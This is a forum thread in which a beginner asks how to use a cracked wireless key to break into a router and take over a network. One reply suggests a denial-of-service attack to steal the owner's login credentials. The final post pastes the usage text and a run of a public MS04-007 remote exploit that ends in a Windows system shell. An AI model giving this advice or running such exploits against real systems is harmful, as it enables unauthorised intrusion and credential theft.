sorry for the new thread guys I almost feel like Im spamming the forums but im interested in what to do next after obtaining the wep/wpa key. I know a lot of people just want to steal their neighbors wireless or get free internet at a hotel but I am really Interested In pen testing and being new to linux I could use some help Im doing plenty of reasearch to but I was hopping some tutorials were comming about what to do next. For example how can i access a ap after i obtain the key. more importantly how can i connect by exploiting a port. my router is firewalled and passprotected and for some reason it is inaccesabile by wireless and it is by ethernet?dont know why . im interested now in wirelessly accessing ports to gain control off a net work. Just a nudge towards to right set of tools would help. Im just trying to get the most out of bt because only using it for wep crack seems like using a ferrari for a closet. thanks

I would hope most of the people here are interested in more than ripping off their neighbor's wireless. I hope this is your own router you are trying to exploit. Possibly if you rephrase your question... :D

nmap -v -A <router ip>

The above command will show you what common ports are open on your router and possibly what kind of router it is.

You could google for the type of router plus exploit.

You could possibly create a denial of service and steal the login credentials with a **** attack when the owner logs in to see what's going on.

Stealing your neighbor's bandwidth can have unexpected results. An email "from you" to everyone in your address book concerning your new sexual orientation comes to mind.:D

Have Fun

Of course its my own router and I know how to use n-map. My router Is only open on 80 and 443 both http ports as far as i can figure. the problem is i cant access the login screen wire lessly but i can from one of the hardwired pcs on my net work. I guess im looking for the work around that. i.e connecting to a router port wirelessly {through a firewall} in order to access the net work. I realize this is a tall order but some help in the right direction would help..........such as im now reading up and studing metasploit but some of the types of exploits are way over my head. maby if you guys know another forum or site i have not yet visited. thanks, :D

Of course its my own router and I know how to use n-map. My router Is only open on 80 and 443 both http ports as far as i can figure. the problem is i cant access the login screen wire lessly but i can from one of the hardwired pcs on my net work. I guess im looking for the work around that. i.e connecting to a router port wirelessly {through a firewall} in order to access the net work. I realize this is a tall order but some help in the right direction would help..........such as im now reading up and studing metasploit but some of the types of exploits are way over my head. maby if you guys know another forum or site i have not yet visited. thanks, :D
One vector of attack would be if someone connected to port 80, they could do a banner grab and find out what version of IIS/Apache you're running, and if it has any associated exploits.

$ ./kill-bill.pl
. kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
by Solar Eclipse <solareclipse@phreedom.org>

Usage: kill-bill -p <port> -s <service> host

Services:
iis IIS HTTP server (port 80)
iis-ssl IIS HTTP server with SSL (port 443)
exchange Microsoft Exchange SMTP server (port 25)
smb-nbt SMB over NetBIOS (port 139)
smb SMB (port 445)

If a service is running on its default port you don't have to
specify both the service and the port.

Examples: kill-bill -s iis 192.168.0.1
kill-bill -p 80 192.168.0.1
kill-bill -p 1234 -s smb 192.168.0.1

$ ./kill-bill.pl -s smb 192.168.0.1
. kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
by Solar Eclipse <solareclipse@phreedom.org>

. Loading shellcode
. Generating SPNEGO token
SPNEGO token is 4222 bytes long.
. Exploiting SMB server at 192.168.0.1:445
Sending Negotiate Protocol Request
Sending Session Setup AndX request (4287) bytes
. Attempting to connect to shell on port 8721

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


this comes with some exploit instructions. any one know it?